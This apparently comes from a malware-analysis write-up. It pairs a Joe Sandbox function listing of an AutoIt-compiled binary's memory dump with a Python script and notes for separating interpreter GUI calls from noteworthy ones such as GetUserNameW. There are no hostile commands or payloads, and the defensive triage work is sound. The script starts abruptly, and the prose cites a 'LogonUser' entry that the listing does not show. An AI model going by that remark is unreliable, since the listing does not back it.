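• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
• Instruction Fuzzy Hash: B1C04CF1801109EBCB05DBA0D988EEE77BCAB04304F140456A109B2100D7749B488B71
APIs
Strings
Similarity
• API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
• String ID: "$#OnAutoItStartRegister$#ce$#include$#requireadmin$'$Bad directive syntax error
• API String ID: 2660009612-1645009161
• Instruction Fuzzy Hash: 3BA1D031A40209ABCB14AF60DC42EAE77B4EF95741F14642DFE09BB292EB71DE05D750
APIs
• CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00EB7D1D
  • Part of subcall function 00E41F1D: InvalidateRect.USER32(?,00000000,00000001), ref: 00E41F76
• SendMessageW.USER32(00000030,00000000,00000001), ref: 00EB7DF5
Similarity
• API ID: Window$Create$MessageSend
• String ID: AutoIt v3$DISPLAY$msctls_progress32$static
• API String ID: 2910397461-517079104
• Instruction Fuzzy Hash: 24A17F7100A305AFD7119F65ED08F6B7BA9FF48329F181A2EF962A61A0C731D845CF52
"""

# Assumed indicator set: AutoIt v3 preprocessor directives (documented by
# AutoIt) plus the title the runtime gives its own splash/progress window.
AUTOIT_DIRECTIVES = {"#requireadmin", "#onautoitstartregister", "#notrayicon",
                     "#include", "#include-once", "#pragma compile"}
AUTOIT_WINDOW_TITLE = "autoit v3"

# "• Name.MODULE(" with an optional "Part of subcall function XXXX: " prefix.
API_RE = re.compile(r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?(\w+)\.(\w+)\(")
FIELD_RE = re.compile(r"^\s*•\s*(API ID|String ID|API String ID|Instruction Fuzzy Hash):\s*(.*)$")


def parse_listing(text):
    """Split the listing at each 'APIs' header and collect the fields of every entry.

    Returns a list of dicts: apis = [(MODULE, name, is_subcall)], strings = [...],
    api_id, api_string_id, fuzzy. Joe Sandbox joins strings with '$', so a string
    that itself contains '$' would be split too; acceptable for triage.
    """
    entries, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = {"apis": [], "strings": [], "api_id": "", "api_string_id": "", "fuzzy": ""}
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            cur["apis"].append((m.group(2).upper(), m.group(1), "Part of subcall" in line))
            continue
        m = FIELD_RE.match(line)
        if m:
            key, value = m.groups()
            if key == "String ID":
                cur["strings"] = [s for s in value.split("$") if s]
            elif key == "API ID":
                cur["api_id"] = value
            elif key == "API String ID":
                cur["api_string_id"] = value
            else:
                cur["fuzzy"] = value
    return entries


def autoit_indicators(entries):
    """Return (entry_index, reason) for entries carrying AutoIt runtime strings."""
    hits = []
    for i, e in enumerate(entries):
        lowered = {s.lower() for s in e["strings"]}
        directives = sorted(lowered & AUTOIT_DIRECTIVES)
        if directives:
            hits.append((i, "directives:" + ",".join(directives)))
        if AUTOIT_WINDOW_TITLE in lowered:
            hits.append((i, "window title:AutoIt v3"))
    return hits


def imports_by_module(entries, include_subcalls=False):
    """Tally the API names each module contributes; subcall lines are optional."""
    mods = defaultdict(set)
    for e in entries:
        for module, name, is_subcall in e["apis"]:
            if is_subcall and not include_subcalls:
                continue
            mods[module].add(name)
    return {k: sorted(v) for k, v in sorted(mods.items())}


if __name__ == "__main__":
    parsed = parse_listing(SAMPLE_LISTING)
    for idx, reason in autoit_indicators(parsed):
        print(f"entry {idx}: {reason}")
    for module, names in imports_by_module(parsed, include_subcalls=True).items():
        print(f"{module}: {', '.join(names)}")
```

Run against the full listing (copy the text of the function section into a file and pass it to parse_listing), the module tally alone separates the USER32/GDI32 GUI scaffolding of the interpreter from the few calls worth looking at, such as GetUserNameW and the LogonUser-keyed entry above, and the indicator check stops an analyst from spending time reversing the runtime itself.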
                                                                                                          APIs
                                                                                                          • DestroyWindow.USER32(00000000), ref: 00EB7BC8
                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00EB7C87
                                                                                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00EB7CC5
                                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00EB7CD7
                                                                                                          • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00EB7D1D
                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00EB7D29
                                                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00EB7D6D
                                                                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00EB7D7C
                                                                                                          • GetStockObject.GDI32(00000011), ref: 00EB7D8C
                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00EB7D90
                                                                                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00EB7DA0
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EB7DA9
                                                                                                          • DeleteDC.GDI32(00000000), ref: 00EB7DB2
                                                                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00EB7DDE
                                                                                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 00EB7DF5
                                                                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00EB7E30
                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00EB7E44
                                                                                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 00EB7E55
                                                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00EB7E85
                                                                                                          • GetStockObject.GDI32(00000011), ref: 00EB7E90
                                                                                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00EB7E9B
                                                                                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00EB7EA5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                          • API String ID: 2910397461-517079104
                                                                                                          • Opcode ID: c26ee6d50eb64836a8ecb28859440122d4ee9a221e66f023538cf9c598ac0756
                                                                                                          • Instruction ID: 77081c3559aa7e6361288c9453e62a8dfce4f3d2826fabae97e542b17c2a6827
                                                                                                          • Opcode Fuzzy Hash: c26ee6d50eb64836a8ecb28859440122d4ee9a221e66f023538cf9c598ac0756
                                                                                                          • Instruction Fuzzy Hash: 2AA15BB1A01219BFEB149BA5DC4AFAFBBA9EB48710F044155FA15B72E0C670AD04CF60
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00EAB361
• GetDriveTypeW.KERNEL32(?,00ED2C4C,?,\\.\,00ED0980), ref: 00EAB43E
• SetErrorMode.KERNEL32(00000000,00ED2C4C,?,\\.\,00ED0980), ref: 00EAB59C
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: ErrorMode$DriveType
• String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
• API String ID: 2907320926-4222207086
• Opcode ID: bb62f81360b7a0f18ebda318775ec24202c6314fa94bd097eac2a064aa23a83b
• Instruction ID: 4616e933ee4ee92cb7840879c608781403c721dec0e9900b6f0a040980c651ba
• Opcode Fuzzy Hash: bb62f81360b7a0f18ebda318775ec24202c6314fa94bd097eac2a064aa23a83b
• Instruction Fuzzy Hash: 25517470F4420DEB8700EB60C942AB977E2BB8E344B247516E506BE2D3E771BE85DA51
APIs
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00ECA0F7
• SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00ECA1B0
• SendMessageW.USER32(?,00001102,00000002,?), ref: 00ECA1CC
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: MessageSend$Window
• String ID: 0
• API String ID: 2326795674-4108050209
• Opcode ID: ae6206aed396d07b037fe3eb5961c4b453205c8753abc89d12fa03c7db4c4173
• Instruction ID: 000d440cecbb4c2dc92c13fbb08a77ea53bdc5772447d13b7bf6386d9800ef32
• Opcode Fuzzy Hash: ae6206aed396d07b037fe3eb5961c4b453205c8753abc89d12fa03c7db4c4173
• Instruction Fuzzy Hash: CB02DD30109308AFD719CF14CA49FAABBE4FB8531CF08952DF995A72A1C776D846CB52
APIs
• GetSysColor.USER32(00000012), ref: 00ECAF51
• SetTextColor.GDI32(?,?), ref: 00ECAF55
• GetSysColorBrush.USER32(0000000F), ref: 00ECAF6B
• GetSysColor.USER32(0000000F), ref: 00ECAF76
• CreateSolidBrush.GDI32(?), ref: 00ECAF7B
• GetSysColor.USER32(00000011), ref: 00ECAF93
• CreatePen.GDI32(00000000,00000001,00743C00), ref: 00ECAFA1
• SelectObject.GDI32(?,00000000), ref: 00ECAFB2
• SetBkColor.GDI32(?,00000000), ref: 00ECAFBB
• SelectObject.GDI32(?,?), ref: 00ECAFC8
• InflateRect.USER32(?,000000FF,000000FF), ref: 00ECAFE7
• RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00ECAFFE
• GetWindowLongW.USER32(00000000,000000F0), ref: 00ECB013
• SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00ECB05F
• GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00ECB086
• InflateRect.USER32(?,000000FD,000000FD), ref: 00ECB0A4
• DrawFocusRect.USER32(?,?), ref: 00ECB0AF
• GetSysColor.USER32(00000011), ref: 00ECB0BD
• SetTextColor.GDI32(?,00000000), ref: 00ECB0C5
• DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00ECB0D9
• SelectObject.GDI32(?,00ECAC1F), ref: 00ECB0F0
• DeleteObject.GDI32(?), ref: 00ECB0FB
• SelectObject.GDI32(?,?), ref: 00ECB101
• DeleteObject.GDI32(?), ref: 00ECB106
• SetTextColor.GDI32(?,?), ref: 00ECB10C
• SetBkColor.GDI32(?,?), ref: 00ECB116
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
• String ID:
• API String ID: 1996641542-0
• Opcode ID: ae5d0f37098dbd0268ef84cf0396a06d352bff96aea84eab3f33ab2a48e800a2
• Instruction ID: bfc5453ef06879e806ac83c1fefaf6f1051a7422ba1363cc5750ece77cdf32bf
• Opcode Fuzzy Hash: ae5d0f37098dbd0268ef84cf0396a06d352bff96aea84eab3f33ab2a48e800a2
• Instruction Fuzzy Hash: 0B618A71902218BFDB119FA5ED49FAE7B79EF08320F18411AF925BB2A1C7719944CF90
APIs
• SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00EC90EA
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EC90FB
• CharNextW.USER32(0000014E), ref: 00EC912A
• SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00EC916B
• SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00EC9181
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EC9192
• SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00EC91AF
• SetWindowTextW.USER32(?,0000014E), ref: 00EC91FB
• SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00EC9211
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00EC9242
• _memset.LIBCMT ref: 00EC9267
• SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00EC92B0
• _memset.LIBCMT ref: 00EC930F
• SendMessageW.USER32(?,00001053,000000FF,?), ref: 00EC9339
• SendMessageW.USER32(?,00001074,?,00000001), ref: 00EC9391
• SendMessageW.USER32(?,0000133D,?,?), ref: 00EC943E
• InvalidateRect.USER32(?,00000000,00000001), ref: 00EC9460
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00EC94AA
• SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00EC94D7
• DrawMenuBar.USER32(?), ref: 00EC94E6
• SetWindowTextW.USER32(?,0000014E), ref: 00EC950E
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
• String ID: 0
• API String ID: 1073566785-4108050209
• Opcode ID: e543b459f63d5626f0a86614f11d76845443714358d1bd3f208b46dc52ac551a
• Instruction ID: feaf0bcdfdc799659d9f8b1b6832320e619dc96154e8288e1efa567671b298ee
• Opcode Fuzzy Hash: e543b459f63d5626f0a86614f11d76845443714358d1bd3f208b46dc52ac551a
• Instruction Fuzzy Hash: D4E1B170901208AFDB209F91DD89FEE7BB8FF05754F04915AF914BA292C7318A86DF20
APIs
• GetCursorPos.USER32(?), ref: 00EC5007
• GetDesktopWindow.USER32 ref: 00EC501C
• GetWindowRect.USER32(00000000), ref: 00EC5023
• GetWindowLongW.USER32(?,000000F0), ref: 00EC5085
• DestroyWindow.USER32(?), ref: 00EC50B1
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00EC50DA
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EC50F8
• SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00EC511E
• SendMessageW.USER32(?,00000421,?,?), ref: 00EC5133
• SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00EC5146
• IsWindowVisible.USER32(?), ref: 00EC5166
• SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00EC5181
• SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00EC5195
• GetWindowRect.USER32(?,?), ref: 00EC51AD
• MonitorFromPoint.USER32(?,?,00000002), ref: 00EC51D3
• GetMonitorInfoW.USER32(00000000,?), ref: 00EC51ED
• CopyRect.USER32(?,?), ref: 00EC5204
• SendMessageW.USER32(?,00000412,00000000), ref: 00EC526F
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
• String ID: ($0$tooltips_class32
• API String ID: 698492251-4156429822
• Opcode ID: 8464bc984f0b4ad87caec25308d852c5f0435ee4db8da8f112824cc9d3954649
• Instruction ID: a4193cf826b40f47b9272c0a28b719db738d8fd16da62c7e9baa2c93645465c4
• Opcode Fuzzy Hash: 8464bc984f0b4ad87caec25308d852c5f0435ee4db8da8f112824cc9d3954649
• Instruction Fuzzy Hash: 0BB1A972604740AFD704DF25D989F6ABBE0FF88304F04991DF499AB2A1D771E846CB92
                                                                                                          APIs
                                                                                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00EA499C
                                                                                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00EA49C2
                                                                                                          • _wcscpy.LIBCMT ref: 00EA49F0
                                                                                                          • _wcscmp.LIBCMT ref: 00EA49FB
                                                                                                          • _wcscat.LIBCMT ref: 00EA4A11
                                                                                                          • _wcsstr.LIBCMT ref: 00EA4A1C
                                                                                                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00EA4A38
                                                                                                          • _wcscat.LIBCMT ref: 00EA4A81
                                                                                                          • _wcscat.LIBCMT ref: 00EA4A88
                                                                                                          • _wcsncpy.LIBCMT ref: 00EA4AB3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                          • API String ID: 699586101-1459072770
                                                                                                          • Opcode ID: 6bea6a44e15a18aeb533ccc58d395c35833ad60f2434b23084fe6734d9a56f9c
                                                                                                          • Instruction ID: dc499321d796462e6bc282e278f093de18f5204490a401e77f1e38f5f2a6c81c
                                                                                                          • Opcode Fuzzy Hash: 6bea6a44e15a18aeb533ccc58d395c35833ad60f2434b23084fe6734d9a56f9c
                                                                                                          • Instruction Fuzzy Hash: 94411972A403047ADB11B730AD43EBFB7ECDF85350F04205AFA05BA1D2EB70AA0196B5
                                                                                                          APIs
                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E42C8C
                                                                                                          • GetSystemMetrics.USER32(00000007), ref: 00E42C94
                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E42CBF
                                                                                                          • GetSystemMetrics.USER32(00000008), ref: 00E42CC7
                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 00E42CEC
                                                                                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00E42D09
                                                                                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00E42D19
                                                                                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00E42D4C
                                                                                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00E42D60
                                                                                                          • GetClientRect.USER32(00000000,000000FF), ref: 00E42D7E
                                                                                                          • GetStockObject.GDI32(00000011), ref: 00E42D9A
                                                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E42DA5
                                                                                                            • Part of subcall function 00E42714: GetCursorPos.USER32(?), ref: 00E42727
                                                                                                            • Part of subcall function 00E42714: ScreenToClient.USER32(00F077B0,?), ref: 00E42744
                                                                                                            • Part of subcall function 00E42714: GetAsyncKeyState.USER32(00000001), ref: 00E42769
                                                                                                            • Part of subcall function 00E42714: GetAsyncKeyState.USER32(00000002), ref: 00E42777
                                                                                                          • SetTimer.USER32(00000000,00000000,00000028,00E413C7), ref: 00E42DCC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                          • String ID: AutoIt v3 GUI$h
                                                                                                          • API String ID: 1458621304-1309884394
                                                                                                          • Opcode ID: acf86a0817d87421c6544df461e0df5cae2475881f595f722b2d1d13feb02e65
                                                                                                          • Instruction ID: 8eec4bf0724402ff15db0703bdd4d64d68d3b4d36b8a8a0ff1b3eec9b03dd73b
                                                                                                          • Opcode Fuzzy Hash: acf86a0817d87421c6544df461e0df5cae2475881f595f722b2d1d13feb02e65
                                                                                                          • Instruction Fuzzy Hash: F1B15E71A0020A9FDB14DF68EC89BAD7BB4FB48314F109269FA15B7290DB70E851DF54
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E51821: _memmove.LIBCMT ref: 00E5185B
                                                                                                          • GetForegroundWindow.USER32(00ED0980,?,?,?,?,?), ref: 00E604E3
                                                                                                          • IsWindow.USER32(?), ref: 00E966BB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Foreground_memmove
                                                                                                          • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                          • API String ID: 3828923867-1919597938
                                                                                                          • Opcode ID: 678020ee57b9b0aefb78badc2f762bfe640a7d33d92e9100163a29771eb61c2e
                                                                                                          • Instruction ID: 361ca2ac176edafa61b1c5b1128606cf8457b27551479e20a1737e749414f48b
                                                                                                          • Opcode Fuzzy Hash: 678020ee57b9b0aefb78badc2f762bfe640a7d33d92e9100163a29771eb61c2e
                                                                                                          • Instruction Fuzzy Hash: 64D18670104202EFCF04EF60D441AAABBF5BF54348F146A5AF856776A2DB30F959CB92
                                                                                                          APIs
                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 00EC44AC
                                                                                                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00EC456C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuffCharMessageSendUpper
                                                                                                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                          • API String ID: 3974292440-719923060
                                                                                                          • Opcode ID: 75d5c8c85cb6198e4432834ddbf97a1b23bbede3bb7c5e491627ed5fafcfe00e
                                                                                                          • Instruction ID: 18a909a2d3e5dc7b9e1f8acba5fb5c07f2547a188a5e6daae48b5fc43c1ab636
                                                                                                          • Opcode Fuzzy Hash: 75d5c8c85cb6198e4432834ddbf97a1b23bbede3bb7c5e491627ed5fafcfe00e
                                                                                                          • Instruction Fuzzy Hash: 4EA17EB02142159BCB14EF20DA61F6AB3E5AF85314F20696DF8567B2D2DB31EC0ACB51
                                                                                                          APIs
                                                                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 00EB56E1
                                                                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 00EB56EC
                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00EB56F7
                                                                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00EB5702
                                                                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 00EB570D
                                                                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 00EB5718
                                                                                                          • LoadCursorW.USER32(00000000,00007F81), ref: 00EB5723
